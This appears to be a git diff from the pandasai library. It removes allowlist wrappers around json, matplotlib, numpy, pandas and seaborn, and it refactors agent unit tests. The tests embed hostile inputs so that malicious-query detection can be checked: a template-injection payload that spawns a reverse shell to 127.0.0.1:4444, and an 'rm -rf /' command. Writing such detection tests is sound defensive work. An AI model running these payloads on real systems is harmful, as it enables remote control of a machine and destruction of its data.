--- a/pandasai/safe_libs/restricted_json.py
+++ /dev/null
@@ -1,23 +0,0 @@
-import json
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedJson(BaseRestrictedModule):
- def __init__(self):
- self.allowed_functions = [
- "load",
- "loads",
- "dump",
- "dumps",
- ]
-
- # Bind the allowed functions to the object
- for func in self.allowed_functions:
- if hasattr(json, func):
- setattr(self, func, self._wrap_function(getattr(json, func)))
-
- def __getattr__(self, name):
- if name not in self.allowed_functions:
- raise AttributeError(f"'{name}' is not allowed in RestrictedJson")
- return getattr(json, name)
diff --git a/pandasai/safe_libs/restricted_matplotlib.py b/pandasai/safe_libs/restricted_matplotlib.py
deleted file mode 100644
index 82635bfda..000000000
--- a/pandasai/safe_libs/restricted_matplotlib.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import matplotlib.axes as axes
-import matplotlib.figure as figure
-import matplotlib.pyplot as plt
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedMatplotlib(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Figure and Axes creation
- "figure",
- "subplots",
- "subplot",
- # Plotting functions
- "plot",
- "scatter",
- "bar",
- "barh",
- "hist",
- "boxplot",
- "violinplot",
- "pie",
- "errorbar",
- "contour",
- "contourf",
- "imshow",
- "pcolor",
- "pcolormesh",
- # Axis manipulation
- "xlabel",
- "ylabel",
- "title",
- "legend",
- "xlim",
- "ylim",
- "axis",
- "xticks",
- "yticks",
- "grid",
- "axhline",
- "axvline",
- # Colorbar
- "colorbar",
- # Text and annotations
- "text",
- "annotate",
- # Styling
- "style",
- # Save and show
- "show",
- "savefig",
- # Color maps
- "get_cmap",
- # 3D plotting
- "axes3d",
- # Utility functions
- "close",
- "clf",
- "cla",
- # Constants
- "rcParams",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(plt, attr):
- setattr(self, attr, self._wrap_function(getattr(plt, attr)))
-
- # Special handling for figure and axes
- self.Figure = self._wrap_class(figure.Figure)
- self.Axes = self._wrap_class(axes.Axes)
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedMatplotlib")
- return getattr(plt, name)
diff --git a/pandasai/safe_libs/restricted_numpy.py b/pandasai/safe_libs/restricted_numpy.py
deleted file mode 100644
index 855fb70d6..000000000
--- a/pandasai/safe_libs/restricted_numpy.py
+++ /dev/null
@@ -1,182 +0,0 @@
-import numpy as np
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedNumpy(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Array creation
- "array",
- "zeros",
- "ones",
- "empty",
- "full",
- "zeros_like",
- "ones_like",
- "empty_like",
- "full_like",
- "eye",
- "identity",
- "diag",
- "arange",
- "linspace",
- "logspace",
- "geomspace",
- "fromfunction",
- "fromiter",
- # Array manipulation
- "reshape",
- "ravel",
- "flatten",
- "moveaxis",
- "rollaxis",
- "swapaxes",
- "transpose",
- "split",
- "hsplit",
- "vsplit",
- "dsplit",
- "stack",
- "column_stack",
- "dstack",
- "row_stack",
- "concatenate",
- "vstack",
- "hstack",
- "tile",
- "repeat",
- # Mathematical operations
- "add",
- "subtract",
- "multiply",
- "divide",
- "power",
- "mod",
- "remainder",
- "divmod",
- "negative",
- "positive",
- "absolute",
- "fabs",
- "rint",
- "floor",
- "ceil",
- "trunc",
- "exp",
- "expm1",
- "exp2",
- "log",
- "log10",
- "log2",
- "log1p",
- "sqrt",
- "square",
- "cbrt",
- "reciprocal",
- # Trigonometric functions
- "sin",
- "cos",
- "tan",
- "arcsin",
- "arccos",
- "arctan",
- "arctan2",
- "hypot",
- "sinh",
- "cosh",
- "tanh",
- "arcsinh",
- "arccosh",
- "arctanh",
- "deg2rad",
- "rad2deg",
- # Statistical functions
- "mean",
- "average",
- "median",
- "std",
- "var",
- "min",
- "max",
- "argmin",
- "argmax",
- "sum",
- "prod",
- "percentile",
- "quantile",
- "histogram",
- "histogram2d",
- "histogramdd",
- "bincount",
- "digitize",
- # Linear algebra
- "dot",
- "vdot",
- "inner",
- "outer",
- "matmul",
- "tensordot",
- "einsum",
- "trace",
- "diagonal",
- # Sorting and searching
- "sort",
- "argsort",
- "partition",
- "argpartition",
- "searchsorted",
- "nonzero",
- "where",
- "extract",
- # Logic functions
- "all",
- "any",
- "greater",
- "greater_equal",
- "less",
- "less_equal",
- "equal",
- "not_equal",
- "logical_and",
- "logical_or",
- "logical_not",
- "logical_xor",
- "isfinite",
- "isinf",
- "isnan",
- "isneginf",
- "isposinf",
- # Set operations
- "unique",
- "intersect1d",
- "union1d",
- "setdiff1d",
- "setxor1d",
- # Basic array information
- "shape",
- "size",
- "ndim",
- "dtype",
- # Utility functions
- "clip",
- "round",
- "sign",
- "conj",
- "real",
- "imag",
- "copy",
- "asarray",
- "asanyarray",
- "ascontiguousarray",
- "asfortranarray",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(np, attr):
- setattr(self, attr, self._wrap_function(getattr(np, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedNumPy")
- return getattr(np, name)
diff --git a/pandasai/safe_libs/restricted_pandas.py b/pandasai/safe_libs/restricted_pandas.py
deleted file mode 100644
index 75e5a083c..000000000
--- a/pandasai/safe_libs/restricted_pandas.py
+++ /dev/null
@@ -1,110 +0,0 @@
-import pandas as pd
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedPandas(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # DataFrame creation and basic operations
- "DataFrame",
- "Series",
- "concat",
- "merge",
- "join",
- # Data manipulation
- "groupby",
- "pivot",
- "pivot_table",
- "melt",
- "crosstab",
- "cut",
- "qcut",
- "get_dummies",
- "factorize",
- # Indexing and selection
- "loc",
- "iloc",
- "at",
- "iat",
- # Function application
- "apply",
- "applymap",
- "pipe",
- # Reshaping and sorting
- "sort_values",
- "sort_index",
- "nlargest",
- "nsmallest",
- "rank",
- "reindex",
- "reset_index",
- "set_index",
- # Computations / descriptive stats
- "sum",
- "prod",
- "min",
- "max",
- "mean",
- "median",
- "var",
- "std",
- "sem",
- "skew",
- "kurt",
- "quantile",
- "count",
- "nunique",
- "value_counts",
- "describe",
- "cov",
- "corr",
- # Date functionality
- "to_datetime",
- "date_range",
- # String methods
- "str",
- # Categorical methods
- "Categorical",
- "cut",
- "qcut",
- # Plotting (if visualization is allowed)
- "plot",
- # Utility functions
- "isnull",
- "notnull",
- "isna",
- "notna",
- "fillna",
- "dropna",
- "replace",
- "astype",
- "copy",
- "drop_duplicates",
- # Window functions
- "rolling",
- "expanding",
- "ewm",
- # Time series functionality
- "resample",
- "shift",
- "diff",
- "pct_change",
- # Aggregation
- "agg",
- "aggregate",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(pd, attr):
- setattr(self, attr, self._wrap_function(getattr(pd, attr)))
- elif attr in ["loc", "iloc", "at", "iat"]:
- # These are properties, not functions
- setattr(
- self, attr, property(lambda self, a=attr: getattr(pd.DataFrame, a))
- )
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedPandas")
- return getattr(pd, name)
diff --git a/pandasai/safe_libs/restricted_seaborn.py b/pandasai/safe_libs/restricted_seaborn.py
deleted file mode 100644
index a5ef4c6e8..000000000
--- a/pandasai/safe_libs/restricted_seaborn.py
+++ /dev/null
@@ -1,74 +0,0 @@
-import seaborn as sns
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedSeaborn(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Plot functions
- "scatterplot",
- "lineplot",
- "relplot",
- "displot",
- "histplot",
- "kdeplot",
- "ecdfplot",
- "rugplot",
- "distplot",
- "boxplot",
- "violinplot",
- "boxenplot",
- "stripplot",
- "swarmplot",
- "barplot",
- "countplot",
- "heatmap",
- "clustermap",
- "regplot",
- "lmplot",
- "residplot",
- "jointplot",
- "pairplot",
- "catplot",
- # Axis styling
- "set_style",
- "set_context",
- "set_palette",
- "despine",
- "move_legend",
- "axes_style",
- "plotting_context",
- # Color palette functions
- "color_palette",
- "palplot",
- "cubehelix_palette",
- "light_palette",
- "dark_palette",
- "diverging_palette",
- # Utility functions
- "load_dataset",
- # Figure-level interface
- "FacetGrid",
- "PairGrid",
- "JointGrid",
- # Regression and statistical estimation
- "lmplot",
- "regplot",
- "residplot",
- # Matrix plots
- "heatmap",
- "clustermap",
- # Miscellaneous
- "kdeplot",
- "rugplot",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(sns, attr):
- setattr(self, attr, self._wrap_function(getattr(sns, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedSeaborn")
- return getattr(sns, name)
diff --git a/pandasai/schemas/__init__.py b/pandasai/schemas/__init__.py
deleted file mode 100644
index 538da3b7b..000000000
--- a/pandasai/schemas/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-""" Schemas """
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 92924d20b..84db923a5 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -5,18 +5,20 @@
import pandas as pd
import pytest
-from pandasai.agent.agent import Agent
+from pandasai.agent.base import Agent
+from pandasai.core.prompts.base import BasePrompt
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts.base import BasePrompt
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
+from pandasai.dataframe.base import DataFrame
+from pandasai.exceptions import MaliciousQueryError
class TestAgent:
"Unit tests for Agent class"
@pytest.fixture
- def sample_df(self) -> pd.DataFrame:
- return pd.DataFrame(
+ def sample_df(self) -> DataFrame:
+ return DataFrame(
{
"country": ["United States", "United Kingdom", "Japan", "China"],
"gdp": [
@@ -52,11 +54,11 @@ def test_constructor(self, sample_df, config):
agent_2 = Agent([sample_df], config)
# test multiple agents instances data overlap
- agent_1.context.memory.add("Which country has the highest gdp?", True)
- memory = agent_1.context.memory.all()
+ agent_1._state.memory.add("Which country has the highest gdp?", True)
+ memory = agent_1._state.memory.all()
assert len(memory) == 1
- memory = agent_2.context.memory.all()
+ memory = agent_2._state.memory.all()
assert len(memory) == 0
def test_chat(self, sample_df, config):
@@ -70,146 +72,328 @@ def test_chat(self, sample_df, config):
assert isinstance(response, str)
assert response == "United States has the highest gdp"
- def test_code_generation(self, sample_df, config):
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_code_generation(self, mock_generate_code, sample_df, config):
# Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_generation_pipeline.run = Mock()
- agent.pipeline.code_generation_pipeline.run.return_value = (
- "print(United States has the highest gdp)"
+ mock_generate_code.generate_code.return_value = (
+ "print(United States has the highest gdp)",
+ [],
)
+ agent = Agent(sample_df, config)
+ agent._code_generator = mock_generate_code
+
# Test the chat function
- response = agent.generate_code("Which country has the highest gdp?")
- assert agent.pipeline.code_generation_pipeline.run.called
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest gdp?"
+ )
+ assert agent._code_generator.generate_code.called
assert isinstance(response, str)
+ assert isinstance(additional_dependencies, list)
+
assert response == "print(United States has the highest gdp)"
- def test_code_generation_failure(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_generation_pipeline.run = Mock()
- agent.pipeline.code_generation_pipeline.run.side_effect = Exception(
- "Raise an exception"
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_cache_hit(self, mock_generate_code, agent: Agent):
+ # Set up the cache to return a pre-cached response
+ cached_code = "print('Cached result: US has the highest GDP.')"
+ agent._state.config.enable_cache = True
+ agent._state.cache.get = MagicMock(return_value=cached_code)
+
+ # Mock code generator is not used because of the cache hit
+ mock_generate_code.validate_and_clean_code.return_value = (
+ "print('Cached result: US has the highest GDP.')",
+ [],
)
- # Test the chat function
- response = agent.generate_code("Which country has the highest gdp?")
- assert agent.pipeline.code_generation_pipeline.run.called
- assert (
- response
- == "Unfortunately, I was not able to answer your question, because of the following error:\n\nRaise an exception\n"
+
+ # Generate code
+ response, _ = agent.generate_code("Which country has the highest GDP?")
+
+ # Check that the cached code was used
+ assert response == cached_code
+ assert mock_generate_code.validate_and_clean_code.called_with(cached_code)
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_cache_miss(self, mock_generate_code, agent: Agent):
+ # Set up the cache to return no cached response
+ agent._state.config.enable_cache = True
+ agent._state.cache.get = MagicMock(return_value=None)
+
+ # Mock the code generator to return a new response
+ mock_generate_code.generate_code.return_value = (
+ "print('New result: US has the highest GDP.')",
+ [],
)
+ agent._code_generator = mock_generate_code
- def test_code_execution(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_execution_pipeline.run = Mock()
- agent.pipeline.code_execution_pipeline.run.side_effect = Exception(
- "Raise an exception"
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
+ )
+
+ # Check that the cache miss triggered new code generation
+ assert mock_generate_code.generate_code.called
+ assert response == "print('New result: US has the highest GDP.')"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_direct_sql(self, mock_generate_code, agent: Agent):
+ # Enable direct SQL in the config
+ agent._state.config.direct_sql = True
+
+ # Mock the code generator to return a SQL-based response
+ mock_generate_code.generate_code.return_value = (
+ "SELECT country FROM countries ORDER BY gdp DESC LIMIT 1;",
+ [],
)
- response = agent.execute_code("print(United States has the highest gdp)")
- assert agent.pipeline.code_execution_pipeline.run.called
- assert (
- response
- == "Unfortunately, I was not able to answer your question, because of the following error:\n\nRaise an exception\n"
+ agent._code_generator = mock_generate_code
+
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
)
- def test_code_execution_failure(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_execution_pipeline.run = Mock()
- agent.pipeline.code_execution_pipeline.run.return_value = (
- "United States has the highest gdp"
+ # Check that the SQL-specific prompt was used
+ assert mock_generate_code.generate_code.called
+ assert response == "SELECT country FROM countries ORDER BY gdp DESC LIMIT 1;"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_logs_generation(self, mock_generate_code, agent: Agent):
+ # Mock the logger
+ agent._state.logger.log = MagicMock()
+
+ # Mock the code generator
+ mock_generate_code.generate_code.return_value = (
+ "print('Logging test.')",
+ [],
+ )
+ agent._code_generator = mock_generate_code
+
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Test logging during code generation."
+ )
+
+ # Verify logger was called
+ agent._state.logger.log.assert_any_call("Generating new code...")
+ assert mock_generate_code.generate_code.called
+ assert response == "print('Logging test.')"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_updates_last_prompt(self, mock_generate_code, agent: Agent):
+ # Mock the code generator
+ prompt = "Cust om SQL prompt"
+ mock_generate_code.generate_code.return_value = (
+ "print('Prompt test.')",
+ [],
+ )
+ agent._state.last_prompt_used = None
+ agent._code_generator = mock_generate_code
+
+ # Mock the prompt creation function
+ with patch("pandasai.agent.base.get_chat_prompt", return_value=prompt):
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
+ )
+
+ # Verify the last prompt used is updated
+ assert agent._state.last_prompt_used == prompt
+ assert mock_generate_code.generate_code.called
+ assert response == "print('Prompt test.')"
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_successful_execution(self, mock_code_executor, agent: Agent):
+ # Mock CodeExecutor to return a successful result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "Execution successful"
+ }
+ mock_code_executor.return_value.add_to_env = MagicMock()
+
+ # Execute the code
+ code = "print('Hello, World!')"
+ additional_dependencies = ["numpy"]
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the code was executed and the result is correct
+ assert result == {"result": "Execution successful"}
+ mock_code_executor.return_value.add_to_env.assert_any_call(
+ "dfs", agent._state.dfs
+ )
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_with_direct_sql(self, mock_code_executor, agent: Agent):
+ # Enable direct SQL in the config
+ agent._state.config.direct_sql = True
+
+ # Mock CodeExecutor to return a result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "SQL Execution successful"
+ }
+ mock_code_executor.return_value.add_to_env = MagicMock()
+
+ # Mock SQL method in the DataFrame
+ agent._state.dfs[0].execute_sql_query = MagicMock()
+
+ # Execute the code
+ code = "execute_sql_query('SELECT * FROM table')"
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the SQL execution environment was set up correctly
+ assert result == {"result": "SQL Execution successful"}
+ mock_code_executor.return_value.add_to_env.assert_any_call(
+ "execute_sql_query", agent._state.dfs[0].execute_sql_query
+ )
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_logs_execution(self, mock_code_executor, agent: Agent):
+ # Mock the logger
+ agent._state.logger.log = MagicMock()
+
+ # Mock CodeExecutor to return a result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "Logging test successful"
+ }
+
+ # Execute the code
+ code = "print('Logging test')"
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the logger was called with the correct message
+ agent._state.logger.log.assert_called_with(f"Executing code: {code}")
+ assert result == {"result": "Logging test successful"}
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_with_missing_dependencies(
+ self, mock_code_executor, agent: Agent
+ ):
+ # Mock CodeExecutor to simulate a missing dependency error
+ mock_code_executor.return_value.execute_and_return_result.side_effect = (
+ ImportError("Missing dependency: pandas")
+ )
+
+ # Execute the code
+ code = "import pandas as pd; print(pd.DataFrame())"
+ additional_dependencies = ["pandas"]
+
+ with pytest.raises(ImportError):
+ agent.execute_code(code, additional_dependencies)
+
+ # Verify the CodeExecutor was called despite the missing dependency
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_handles_empty_code(self, mock_code_executor, agent: Agent):
+ # Mock CodeExecutor to return an empty result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {}
+
+ # Execute empty code
+ code = ""
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the result is empty and the code executor was not called
+ assert result == {}
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
)
- response = agent.execute_code("print(United States has the highest gdp)")
- assert agent.pipeline.code_execution_pipeline.run.called
- assert isinstance(response, str)
- assert response == "United States has the highest gdp"
def test_start_new_conversation(self, sample_df, config):
agent = Agent(sample_df, config, memory_size=10)
- agent.context.memory.add("Which country has the highest gdp?", True)
- memory = agent.context.memory.all()
+ agent._state.memory.add("Which country has the highest gdp?", True)
+ memory = agent._state.memory.all()
assert len(memory) == 1
agent.start_new_conversation()
- memory = agent.context.memory.all()
+ memory = agent._state.memory.all()
assert len(memory) == 0
def test_call_prompt_success(self, agent: Agent):
- agent.context.config.llm.call = Mock()
+ agent._state.config.llm.call = Mock()
clarification_response = """
What is expected Salary Increase?
"""
- agent.context.config.llm.call.return_value = clarification_response
+ agent._state.config.llm.call.return_value = clarification_response
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
agent.call_llm_with_prompt(prompt)
- assert agent.context.config.llm.call.call_count == 1
+ assert agent._state.config.llm.call.call_count == 1
def test_call_prompt_max_retries_exceeds(self, agent: Agent):
# raises exception every time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception("Raise an exception")
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception("Raise an exception")
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 3
+ assert agent._state.config.llm.call.call_count == 3
def test_call_prompt_max_retry_on_error(self, agent: Agent):
# test the LLM call failed twice but succeed third time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = [
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = [
Exception(),
Exception(),
"LLM Result",
]
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
result = agent.call_llm_with_prompt(prompt)
assert result == "LLM Result"
- assert agent.context.config.llm.call.call_count == 3
+ assert agent._state.config.llm.call.call_count == 3
def test_call_prompt_max_retry_twice(self, agent: Agent):
# test the LLM call failed once but succeed second time
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = [Exception(), "LLM Result"]
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = [Exception(), "LLM Result"]
prompt = BasePrompt(
- context=agent.context,
+ context=agent._state,
code="test code",
)
result = agent.call_llm_with_prompt(prompt)
assert result == "LLM Result"
- assert agent.context.config.llm.call.call_count == 2
+ assert agent._state.config.llm.call.call_count == 2
def test_call_llm_with_prompt_no_retry_on_error(self, agent: Agent):
# Test when LLM call raises an exception but retries are disabled
- agent.context.config.use_error_correction_framework = False
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception()
+ agent._state.config.use_error_correction_framework = False
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception()
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 1
+ assert agent._state.config.llm.call.call_count == 1
def test_call_llm_with_prompt_max_retries_check(self, agent: Agent):
# Test when LLM call raises an exception, but called call function
# 'max_retries' time
- agent.context.config.max_retries = 5
- agent.context.config.llm.call = Mock()
- agent.context.config.llm.call.side_effect = Exception()
+ agent._state.config.max_retries = 5
+ agent._state.config.llm.call = Mock()
+ agent._state.config.llm.call.side_effect = Exception()
with pytest.raises(Exception):
agent.call_llm_with_prompt("Test Prompt")
- assert agent.context.config.llm.call.call_count == 5
+ assert agent._state.config.llm.call.call_count == 5
def test_load_llm_with_pandasai_llm(self, agent: Agent, llm):
- assert agent.get_llm(llm) == llm
+ assert agent._get_llm(llm) == llm
def test_load_llm_none(self, agent: Agent, llm):
with patch("pandasai.llm.bamboo_llm.BambooLLM") as mock, patch.dict(
@@ -217,7 +401,8 @@ def test_load_llm_none(self, agent: Agent, llm):
):
bamboo_llm = Mock(type="bamboo")
mock.return_value = bamboo_llm
- config = agent.get_config({"llm": None})
+ print(os.environ)
+ config = agent._get_config({})
assert config.llm.__class__.__name__ == "BambooLLM"
def test_train_method_with_qa(self, agent):
@@ -225,16 +410,18 @@ def test_train_method_with_qa(self, agent):
codes = ["code1", "code2"]
agent.train(queries, codes)
- agent._vectorstore.add_docs.assert_not_called()
- agent._vectorstore.add_question_answer.assert_called_once_with(queries, codes)
+ agent._state.vectorstore.add_docs.assert_not_called()
+ agent._state.vectorstore.add_question_answer.assert_called_once_with(
+ queries, codes
+ )
def test_train_method_with_docs(self, agent):
docs = ["doc1"]
agent.train(docs=docs)
- agent._vectorstore.add_question_answer.assert_not_called()
- agent._vectorstore.add_docs.assert_called_once()
- agent._vectorstore.add_docs.assert_called_once_with(docs)
+ agent._state.vectorstore.add_question_answer.assert_not_called()
+ agent._state.vectorstore.add_docs.assert_called_once()
+ agent._state.vectorstore.add_docs.assert_called_once_with(docs)
def test_train_method_with_docs_and_qa(self, agent):
docs = ["doc1"]
@@ -242,10 +429,12 @@ def test_train_method_with_docs_and_qa(self, agent):
codes = ["code1", "code2"]
agent.train(queries, codes, docs=docs)
- agent._vectorstore.add_question_answer.assert_called_once()
- agent._vectorstore.add_question_answer.assert_called_once_with(queries, codes)
- agent._vectorstore.add_docs.assert_called_once()
- agent._vectorstore.add_docs.assert_called_once_with(docs)
+ agent._state.vectorstore.add_question_answer.assert_called_once()
+ agent._state.vectorstore.add_question_answer.assert_called_once_with(
+ queries, codes
+ )
+ agent._state.vectorstore.add_docs.assert_called_once()
+ agent._state.vectorstore.add_docs.assert_called_once_with(docs)
def test_train_method_with_queries_but_no_code(self, agent):
queries = ["query1", "query2"]
@@ -257,22 +446,15 @@ def test_train_method_with_code_but_no_queries(self, agent):
with pytest.raises(ValueError):
agent.train(codes)
- def test_(self, sample_df, config):
+ def test_malicious_query_detection(self, sample_df, config):
agent = Agent(sample_df, config, memory_size=10)
- response = agent.chat(
- """{% for x in ().__class__.__base__.__subclasses__() %} {% if "warning" in x.__name__ %} {{x()._module.__builtins__['__import__']('os').popen('python3 -c \\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\\'')}} {% endif %} {% endfor %}"""
- )
- assert (
- response
- == """Unfortunately, I was not able to get your answers, because of the following error:
-
-The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.
-"""
- )
+ with pytest.raises(MaliciousQueryError):
+ agent.chat(
+ """{% for x in ().__class__.__base__.__subclasses__() %} {% if "warning" in x.__name__ %} {{x()._module.__builtins__['__import__']('os').popen('python3 -c \\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\\'')}} {% endif %} {% endfor %}"""
+ )
- def test_query_detection(self, sample_df, config):
- agent = Agent(sample_df, config, memory_size=10)
+ def test_query_detection(self, sample_df, config, agent: Agent):
# Positive cases: should detect malicious keywords
malicious_queries = [
@@ -285,26 +467,9 @@ def test_query_detection(self, sample_df, config):
"io.open('file.txt', 'w')",
]
- expected_malicious_response = (
- """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
- """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
- )
-
for query in malicious_queries:
- response = agent.chat(query)
- assert response == expected_malicious_response
-
- # Negative cases: should not detect any malicious keywords
- safe_queries = [
- "print('Hello world')",
- "through osmosis",
- "the ionosphere",
- "the capital of Norway is Oslo",
- ]
-
- for query in safe_queries:
- response = agent.chat(query)
- assert "Unfortunately, I was not able to get your answers" not in response
+ with pytest.raises(MaliciousQueryError):
+ agent.chat(query)
def test_query_detection_disable_security(self, sample_df, config):
config["security"] = "none"
@@ -320,22 +485,5 @@ def test_query_detection_disable_security(self, sample_df, config):
"io.open('file.txt', 'w')",
]
- expected_malicious_response = (
- """Unfortunately, I was not able to get your answers, because of the following error:\n\n"""
- """The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways.\n"""
- )
-
for query in malicious_queries:
- response = agent.chat(query)
- assert response != expected_malicious_response
-
- safe_queries = [
- "print('Hello world')",
- "through osmosis",
- "the ionosphere",
- "the capital of Norway is Oslo",
- ]
-
- for query in safe_queries:
- response = agent.chat(query)
- assert "Unfortunately, I was not able to get your answers" not in response
+ agent.chat(query)
diff --git a/tests/unit_tests/agent/test_base_agent.py b/tests/unit_tests/agent/test_base_agent.py
deleted file mode 100644
index 95b0d9c34..000000000
--- a/tests/unit_tests/agent/test_base_agent.py
+++ /dev/null
@@ -1,60 +0,0 @@
-from pandasai.dataframe.base import DataFrame
-from pandasai.llm.fake import FakeLLM
-import pytest
-from unittest.mock import Mock, patch, MagicMock
-from pandasai.agent.base import BaseAgent
-from pandasai.pipelines.chat.chat_pipeline_input import ChatPipelineInput
-
-
-class TestBaseAgent:
- @pytest.fixture(autouse=True)
- def mock_bamboo_llm(self):
- with patch("pandasai.llm.bamboo_llm.BambooLLM") as mock:
- mock.return_value = Mock(type="bamboo")
- yield mock
-
- @pytest.fixture
- def mock_agent(self):
- # Create a mock DataFrame
- mock_df = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
- fake_llm = FakeLLM()
- agent = BaseAgent([mock_df], config={"llm": fake_llm})
- agent.pipeline = MagicMock()
- return agent
-
- def test_chat_starts_new_conversation(self, mock_agent):
- with patch.object(mock_agent, "start_new_conversation") as mock_start_new:
- mock_agent.chat("Test query")
- mock_start_new.assert_called_once()
-
- def test_follow_up_continues_conversation(self, mock_agent):
- with patch.object(mock_agent, "start_new_conversation") as mock_start_new:
- mock_agent.follow_up("Follow-up query")
- mock_start_new.assert_not_called()
-
- def test_chat_and_follow_up_use_process_query(self, mock_agent):
- with patch.object(mock_agent, "_process_query") as mock_process:
- mock_agent.chat("Test query")
- mock_process.assert_called_once_with("Test query", None)
-
- mock_process.reset_mock()
-
- mock_agent.follow_up("Follow-up query")
- mock_process.assert_called_once_with("Follow-up query", None)
-
- def test_process_query_calls_pipeline(self, mock_agent):
- mock_agent._process_query("Test query")
- mock_agent.pipeline.run.assert_called_once()
- assert isinstance(mock_agent.pipeline.run.call_args[0][0], ChatPipelineInput)
-
- def test_process_query_handles_exceptions(self, mock_agent):
- mock_agent.pipeline.run.side_effect = Exception("Test error")
- result = mock_agent._process_query("Test query")
- assert "Test error" in result
-
- def test_malicious_query_detection(self, mock_agent):
- result = mock_agent._process_query("import os; os.system('rm -rf /')")
- assert (
- "The query contains references to io or os modules or b64decode method which can be used to execute or access system resources in unsafe ways."
- in result
- )
